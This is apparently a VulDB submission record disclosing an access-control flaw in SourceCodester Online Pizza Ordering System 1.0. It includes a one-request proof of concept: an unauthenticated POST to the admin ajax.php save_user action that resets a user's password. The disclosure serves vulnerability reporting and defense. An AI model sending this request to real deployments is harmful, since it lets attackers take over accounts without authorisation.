| Título | SOURCECODESTER ONLINE PIZZA ORDERING SYSTEM 1.0 Unauthorized Password Modification |
|---|
| Descripción | SOURCECODESTER ONLINE PIZZA ORDERING SYSTEM 1.0 has an Unauthorized Password Modification vulnerability, the vulnerability is due to access control weakness. Remote and unauthenticated attacker can change the password directly without login.
There is a poc below :
POST /php-opos/admin/ajax.php?action=save_user HTTP/1.1
*********************************(without cookie in header)
id=2&name=Staff&username=staff&password=abcdefg&type=2
Then the password will be changed to 'abcdefg' without authentication. |
|---|
| Fuente | ⚠️ https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html |
|---|
| Usuario | WWesleywww (UID 43117) |
|---|
| Sumisión | 2023-03-17 08:33 (hace 3 años) |
|---|
| Moderación | 2023-03-17 08:51 (17 minutes later) |
|---|
| Estado | Aceptado |
|---|
| Entrada de VulDB | 223305 [SourceCodester Online Pizza Ordering System 1.0 Password Change ajax.php?action=save_user autenticación débil] |
|---|
| Puntos | 20 |
|---|